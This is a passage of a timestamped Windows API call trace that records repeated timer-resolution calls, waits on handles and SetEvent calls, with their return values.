timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.705] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.717] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.717] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.731] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.731] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.732] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.733] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.735] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.762] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.762] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.771] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.771] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.773] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.773] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.776] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.776] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.798] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.798] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.805] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.805] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.807] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.807] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.811] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.811] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0304.868] timeEndPeriod (uPeriod=0x1) returned 0x0 [0304.868] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0304.885] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0304.885] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.019] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.023] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.023] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.069] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.069] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.188] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.199] SetEvent (hEvent=0x22c) returned 1 [0305.199] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.250] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.425] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.427] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.427] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.453] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.453] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.515] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.556] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.617] SetEvent (hEvent=0x198) returned 1 [0305.618] SetEvent (hEvent=0x220) returned 1 [0305.618] SetEvent (hEvent=0x1e8) returned 1 [0305.618] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.621] SetEvent (hEvent=0x1e8) returned 1 [0305.621] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.637] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.663] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.663] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.711] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.711] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.718] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.719] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.758] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.758] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.763] SetEvent (hEvent=0x190) returned 1 [0305.763] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.768] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.768] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.792] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.792] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.797] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.797] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.815] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.815] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.821] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.821] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.826] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.826] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.833] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.856] timeEndPeriod (uPeriod=0x1) returned 0x0 [0305.857] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0305.857] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0305.857] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0305.899] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.017] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.032] SetEvent (hEvent=0x1e8) returned 1 [0306.032] SetEvent (hEvent=0x134) returned 1 [0306.032] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.035] SetEvent (hEvent=0x134) returned 1 [0306.035] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.053] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.053] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.058] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.058] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.066] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.067] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.067] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.068] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.069] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.226] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.226] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.235] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.236] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.239] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.239] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.317] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.317] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.374] SetEvent (hEvent=0x12c) returned 1 [0306.374] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.384] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.384] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.389] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.389] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.396] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.397] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.397] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.398] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.399] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.405] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.405] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.409] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.409] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.467] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.467] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.469] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.469] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.475] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.526] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.604] SetEvent (hEvent=0x214) returned 1 [0306.604] SetEvent (hEvent=0x20c) returned 1 [0306.604] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.613] SetEvent (hEvent=0x214) returned 1 [0306.613] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.695] SetEvent (hEvent=0x104) returned 1 [0306.695] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.709] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.709] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.737] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.741] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.773] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.783] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.783] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.786] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.787] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.826] SetEvent (hEvent=0x1dc) returned 1 [0306.826] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.885] SetEvent (hEvent=0x1dc) returned 1 [0306.885] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.929] SetEvent (hEvent=0x1dc) returned 1 [0306.929] SetEvent (hEvent=0x104) returned 1 [0306.929] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.940] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.940] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0306.942] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0306.942] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.977] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0306.989] timeEndPeriod (uPeriod=0x1) returned 0x0 [0306.989] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.044] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.044] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.079] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.086] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.086] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.091] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.091] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.095] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.095] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.110] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.110] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.178] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.201] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.201] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.209] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.209] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.298] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.303] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.304] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.306] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.306] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.326] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.326] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.332] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.332] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.339] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.345] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.345] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.364] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.365] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.373] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.425] SetEvent (hEvent=0x1ac) returned 1 [0307.425] SetEvent (hEvent=0x104) returned 1 [0307.425] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.445] SetEvent (hEvent=0x104) returned 1 [0307.445] SetEvent (hEvent=0x134) returned 1 [0307.445] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.558] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.563] SetEvent (hEvent=0x104) returned 1 [0307.563] SetEvent (hEvent=0x198) returned 1 [0307.563] SetEvent (hEvent=0x184) returned 1 [0307.563] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.572] SetEvent (hEvent=0x184) returned 1 [0307.572] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.639] SetEvent (hEvent=0x184) returned 1 [0307.639] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.662] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.680] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.680] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.687] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.687] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.701] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.701] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.705] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.705] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.709] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.785] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.842] SetEvent (hEvent=0x220) returned 1 [0307.842] SetEvent (hEvent=0x1d0) returned 1 [0307.842] SetEvent (hEvent=0x1dc) returned 1 [0307.843] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.847] SetEvent (hEvent=0x1dc) returned 1 [0307.848] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.854] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.854] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.858] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.858] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.885] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0307.888] timeEndPeriod (uPeriod=0x1) returned 0x0 [0307.889] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0307.964] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0307.964] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.081] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.150] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.160] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.177] timeEndPeriod (uPeriod=0x1) returned 0x0 [0308.177] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0308.184] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0308.184] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.245] SetEvent (hEvent=0x214) returned 1 [0308.245] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.350] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.357] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.367] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.370] timeEndPeriod (uPeriod=0x1) returned 0x0 [0308.370] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0308.465] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0308.465] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.497] SetEvent (hEvent=0x1f0) returned 1 [0308.497] SetEvent (hEvent=0x104) returned 1 [0308.497] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.515] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.544] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.551] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.553] timeEndPeriod (uPeriod=0x1) returned 0x0 [0308.553] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0308.610] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0308.610] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.646] SetEvent (hEvent=0x134) returned 1 [0308.646] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.705] SetEvent (hEvent=0x198) returned 1 [0308.705] SetEvent (hEvent=0x220) returned 1 [0308.705] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.736] SetEvent (hEvent=0x220) returned 1 [0308.736] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.750] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.754] timeEndPeriod (uPeriod=0x1) returned 0x0 [0308.754] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0308.769] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0308.769] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.773] SetEvent (hEvent=0x198) returned 1 [0308.773] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.774] SetEvent (hEvent=0x190) returned 1 [0308.775] SetEvent (hEvent=0x14c) returned 1 [0308.775] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.777] SetEvent (hEvent=0x1dc) returned 1 [0308.777] SetEvent (hEvent=0x1d0) returned 1 [0308.777] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.781] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.783] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.785] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.786] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.787] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0308.789] timeEndPeriod (uPeriod=0x1) returned 0x0 [0308.789] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.155] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.155] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.322] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.326] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.330] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.331] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.362] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.364] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.371] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.383] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.383] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.407] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.407] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.412] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.414] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.415] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.415] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.428] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.428] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.497] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.497] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.512] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.513] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.516] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.517] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.538] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.539] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.541] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.542] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.542] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.543] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.543] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.554] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.554] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.559] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.560] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.615] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.615] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.619] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.619] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.626] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.626] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.629] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.629] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.641] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.641] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.643] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.643] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.650] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.650] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.656] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.656] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.762] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.827] timeEndPeriod (uPeriod=0x1) returned 0x0 [0309.827] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0309.891] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0309.892] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0309.944] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.012] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.032] SetEvent (hEvent=0x220) returned 1 [0310.032] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.111] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.116] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.116] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.157] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.157] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.163] timeEndPeriod (uPeriod=0x1) returned 0x0 [0310.163] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0xea60) returned 0x0 [0310.166] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0310.166] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.309] SetEvent (hEvent=0x1e8) returned 1 [0310.309] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.315] SetEvent (hEvent=0x198) returned 1 [0310.315] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.375] SetEvent (hEvent=0x198) returned 1 [0310.375] SetEvent (hEvent=0x14c) returned 1 [0310.375] NtWaitForSingleObject (Object=0xffffffff, Alertable=0, Time=0x3244fedc) returned 0x102 [0310.381] SetEvent (hEvent=0x12c) returned 1 [0310.381] 